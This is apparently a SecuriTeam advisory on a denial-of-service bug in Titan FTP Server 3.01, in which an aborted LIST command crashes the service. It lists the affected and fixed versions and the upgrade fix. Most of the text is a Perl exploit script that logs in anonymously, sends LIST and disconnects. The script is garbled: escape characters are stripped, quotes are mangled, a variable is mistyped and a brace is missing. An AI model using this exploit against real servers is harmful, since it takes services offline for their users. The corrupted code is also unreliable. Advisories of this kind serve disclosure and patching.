‘Titan FTP Server Aborted LIST DoS’

Summary

‘A security vulnerability exists in South River Technologies’ Titan FTP Server, a user issuing a LIST command and disconnecting before the LIST command had the time to connect, will cause the program to try and access an invalid socket. This will result in the FTP service’s crash (and in turn, no longer being able to service any additional users).’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable Systems:
 * Titan FTP Server version 3.01 build 163

Immune Systems:
 * Titan FTP Server version 3.10 build 169

Solution:
To solve this issue upgrade to the latest version (3.10 build 169 or newer).

Exploit:
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
#

use IO::Socket;

$host = ‘192.168.1.243’;

my @combination;
$combination[0] = ‘LIST rn’;

for (my $i = 0; $combination[$i] ; $i++)
{
 print ‘Combination: $1n’;

 $remote = IO::Socket::INET->new ( Proto => ‘tcp’,
     PeerAddr => $host,
     PeerPort => ‘2112’,
     );
 unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

 print ‘connectedn’;
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = ‘USER anonymousrn’;

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 $ftp = ‘PASS a@b.comrn’;
 print $remote $ftp;
 print $ftp;
 
 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }
 
 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }
 

 close $remote;
}’

Categories: Windows